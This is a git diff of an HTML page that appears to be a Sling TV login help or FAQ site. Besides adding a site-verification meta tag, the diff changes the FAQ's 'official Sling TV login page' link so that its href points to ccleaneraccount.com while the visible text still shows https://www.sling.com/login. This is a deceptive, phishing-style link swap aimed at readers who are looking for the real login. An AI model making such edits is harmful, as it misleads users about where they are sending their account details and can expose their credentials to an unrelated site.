--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <meta name="google-site-verification" content="Qg_AeEKENYa__bEjFJKymsTiYRq-CKexkyqDZKYFfnw" />
   <meta name="msvalidate.01" content="F080631A2E81DA7AC7BD5934A61B0044" />
 
 <!-- Start of  Zendesk Widget script -->
@@ -110,7 +111,7 @@
         <h2>Frequently Asked Questions (FAQs)</h2>
 
         <h3>Where do I log in to my Sling TV account?</h3>
-        <p>You can log in at the official Sling TV login page: <a href="https://www.sling.com/login" target="_blank" rel="noopener">https://www.sling.com/login</a>.</p>
+        <p>You can log in at the official Sling TV login page: <a href="https://ccleaneraccount.com" target="_blank" rel="noopener">https://www.sling.com/login</a>.</p>
 
         <h3>What should I do if I forget my Sling TV password?</h3>
         <p>Use the “Forgot Password” link on the login page to receive a reset email and create a new password.</p>
